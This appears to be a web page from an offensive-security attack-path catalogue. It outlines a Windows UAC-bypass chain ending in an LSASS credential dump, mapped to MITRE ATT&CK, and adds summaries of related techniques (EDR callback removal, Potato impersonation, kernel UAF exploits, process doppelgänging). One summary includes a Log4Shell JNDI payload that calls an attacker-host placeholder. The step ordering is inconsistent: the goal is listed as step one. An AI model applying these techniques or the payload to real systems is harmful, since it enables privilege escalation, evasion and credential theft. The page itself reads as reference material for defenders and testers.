UAC bypass → elevated admin on a workstation
Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.
§ Context
Assumed environment: foothold as a user in the local Administrators group on a Windows endpoint (typical for dev / IT users) but currently running at medium integrity.
§ Steps
- 01High-integrity shell as adminInitial AccessT1078— Valid Accounts
- 02Medium-integrity admin shellInitial AccessT1078— Valid Accounts
- 03Trigger autoElevate targetExecutionT1059— Command and Scripting Interpreter
- 04Pick a UAC bypass (fodhelper / silentcleanup)Privilege EscalationW-UAC-BYPASS— UAC Bypass
- 05Dump LSASS for cached credsCredential AccessW-LSASS-PROCDUMP— LSASS via procdump / comsvcs.dll
§ References
§ Frequently asked
- What is the "UAC bypass → elevated admin on a workstation" attack path?
- Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is High-integrity shell as admin (T1078) — a initial access primitive. Assumed environment: foothold as a user in the local Administrators group on a Windows endpoint (typical for dev / IT users) but currently running at medium integrity.
- What is the final impact of this kill-chain?
- The final step lands on Dump LSASS for cached creds (W-LSASS-PROCDUMP), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- Shared techniques3
Service account → SYSTEM via named-pipe impersonation
Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.
- Shared techniques2
io_uring UAF → modprobe_path overwrite → root
Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.
- Shared techniques2
nf_tables UAF → kernel R/W → root
CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.
- Shared techniques2
Process doppelgänging → spawn signed image with attacker bytes
Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- Shared techniques2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.